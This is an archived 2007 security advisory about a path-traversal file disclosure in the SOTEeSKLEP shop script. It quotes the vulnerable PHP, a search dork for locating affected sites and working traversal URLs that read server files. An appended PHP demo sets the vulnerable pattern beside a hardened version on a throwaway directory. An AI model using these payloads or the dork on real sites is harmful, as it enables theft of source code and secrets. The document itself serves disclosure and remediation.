Computer Security
[EN] securityvulns.ru
From: theoden_(at)_interia.pl <theoden_(at)_interia.pl>
Date: 13.08.2007
Subject: SOTEeSKLEP Remote File Disclosure Vulnerability

SOTEeSKLEP Remote File Disclosure Vulnerability

Script : SOTEeSKLEP

Versions: 3.1RC8, 3.5RC1, 3.5RC4, 3.5RC9, and I think others.

Site : http://www.sote.pl

Bug (the "file" request parameter is concatenated into a filesystem path with no traversal check and the file contents are echoed back):

...
if (! empty($_REQUEST["file"])) { $file=$_REQUEST['file']; }   // attacker-controlled: GET, POST or cookie
...
$file_path="$DOCUMENT_ROOT/themes/_$config->lang/_html_files/$file";   // "../" in $file escapes the theme directory
if (file_exists($file_path)) { $fd=fopen($file_path,"r");
$data=fread($fd,filesize($file_path));
print $data;                                                   // raw file contents returned to the client
fclose($fd);
}
...

Dork: inurl:"/go/_files/?file="

Examples (the three "../" steps climb from themes/_<lang>/_html_files/ back to the document root; the second request returns the vulnerable script's own source):
http://???/go/_files/?file=./.././.././.././
http://???/go/_files/?file=./.././.././.././go/_files/index.php

Discovered by dun
2007.08.11
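The following is an added example and not SOTEeSKLEP code: it puts the unchecked-concatenation pattern from the advisory beside a hardened replacement and runs both against a constructed directory tree laid out like DOCUMENT_ROOT/themes/_<lang>/_html_files/, using the exact traversal payload from the examples above. The function names, the "_pl" language directory, the fixture files and the assumption that the parameter is only ever meant to name one static fragment inside _html_files/ are mine, not the vendor's.

```php
<?php
// Added example, not SOTEeSKLEP code: vulnerable pattern vs. hardened version,
// exercised against a constructed DOCUMENT_ROOT/themes/_<lang>/_html_files/ tree.

// Vulnerable pattern (same logic as the advisory, fopen/fread replaced by
// file_get_contents): $file goes into the path unchecked, so "../" walks out of
// the theme directory and any file the web server can read is returned.
function serveFileVulnerable(string $htmlDir, string $file): ?string
{
    $file_path = "$htmlDir/$file";
    if (file_exists($file_path)) {
        return file_get_contents($file_path);
    }
    return null;
}

// Hardened replacement (assumption: the parameter names one static fragment
// inside _html_files/, nothing else):
//   1. accept only a bare filename of safe characters, so no "/" or "\" and
//      therefore no directory component at all;
//   2. resolve with realpath(), which strips "." and ".." and follows symlinks,
//      and require the resolved regular file to sit directly in $htmlDir.
function serveFileSafe(string $htmlDir, string $file): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_.-]+\z/', $file)) {
        return null;                    // rejects "", "../x", "a/b", NUL bytes, ...
    }
    $dirReal = realpath($htmlDir);
    $target  = realpath("$htmlDir/$file");
    if ($dirReal === false || $target === false || !is_file($target)) {
        return null;                    // missing file, or "." / ".." resolving to a directory
    }
    if (dirname($target) !== $dirReal) {
        return null;                    // a symlink inside the directory pointed outside it
    }
    return file_get_contents($target);
}

// Constructed fixture: a throw-away document root with one legitimate fragment
// in the theme directory and a "script source" three levels up, at the same
// relative position as go/_files/index.php in the advisory.
function buildFixture(): array
{
    $root    = sys_get_temp_dir() . '/sote_demo_' . bin2hex(random_bytes(4));
    $htmlDir = "$root/themes/_pl/_html_files";
    mkdir($htmlDir, 0700, true);
    mkdir("$root/go/_files", 0700, true);
    file_put_contents("$htmlDir/about.html", "<p>about us</p>");
    file_put_contents("$root/go/_files/index.php", "<?php \$db_pass = 'constructed-secret';");
    return [$root, $htmlDir];
}

// Remove the fixture again once the demo has run.
function removeTree(string $dir): void
{
    foreach (array_diff(scandir($dir), ['.', '..']) as $entry) {
        $path = "$dir/$entry";
        is_dir($path) ? removeTree($path) : unlink($path);
    }
    rmdir($dir);
}

[$root, $htmlDir] = buildFixture();
$traversal = './.././.././.././go/_files/index.php';   // payload from the advisory's examples

printf("vulnerable + traversal : %s\n", var_export(serveFileVulnerable($htmlDir, $traversal), true));
printf("hardened   + traversal : %s\n", var_export(serveFileSafe($htmlDir, $traversal), true));
printf("hardened   + about.html: %s\n", var_export(serveFileSafe($htmlDir, 'about.html'), true));

removeTree($root);
```

Run it with the PHP CLI (`php demo.php`, PHP 7.1 or later): the vulnerable function hands back the constructed "script source" from outside the theme directory, the hardened function returns NULL for the same payload and still serves the legitimate about.html. The allow-list regex is what actually closes the hole; the realpath() and dirname() check is the defence in depth for the case where something inside _html_files/ is itself a symlink pointing elsewhere. Note that file_exists() in the original code is not a safeguard at all: it only confirms that the traversed path is there, which is exactly what the attacker wants.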
